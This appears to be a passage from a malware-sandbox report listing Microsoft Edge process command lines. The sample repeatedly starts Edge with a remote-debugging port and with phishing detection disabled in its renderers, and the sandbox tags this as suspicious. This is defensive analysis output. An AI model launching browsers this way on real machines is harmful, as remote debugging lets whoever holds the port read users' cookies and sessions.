        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        8⤵
        
        PID:6052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
        8⤵
        
        PID:6132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
        8⤵
        
        PID:5612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2444 /prefetch:2
        8⤵
        
        PID:6404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3296 /prefetch:2
        8⤵
        
        PID:1032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3292 /prefetch:2
        8⤵
        
        PID:5400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3276 /prefetch:2
        8⤵
        
        PID:5796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3264 /prefetch:2
        8⤵
        
        PID:6564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4092 /prefetch:2
        8⤵
        
        PID:6068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4212 /prefetch:2
        8⤵
        
        PID:6544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15508296672815767232,15832949247387495508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3468 /prefetch:2
        8⤵
        
        PID:6504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:3852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
        8⤵
        
        PID:2000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
        8⤵
        
        PID:6928
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
        8⤵
        
        PID:6776
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2884 /prefetch:2
        8⤵
        
        PID:5252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3312 /prefetch:2
        8⤵
        
        PID:4136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
        8⤵
        
        PID:3368
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4016 /prefetch:2
        8⤵
        
        PID:4112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4020 /prefetch:2
        8⤵
        
        PID:6080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3880 /prefetch:2
        8⤵
        
        PID:5760
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2588 /prefetch:2
        8⤵
        
        PID:6312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,1915102373099639471,5867761387295349087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4088 /prefetch:2
        8⤵
        
        PID:4980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        
        PID:2952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
        8⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 /prefetch:3
        8⤵
        
        PID:5924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
        8⤵
        
        PID:4568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2564 /prefetch:2
        8⤵
        
        PID:6888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2
        8⤵
        
        PID:5644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2528 /prefetch:2
        8⤵
        
        PID:3612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:2
        8⤵
        
        PID:1344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4132 /prefetch:2
        8⤵
        
        PID:6800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3392 /prefetch:2
        8⤵
        
        PID:1856
        
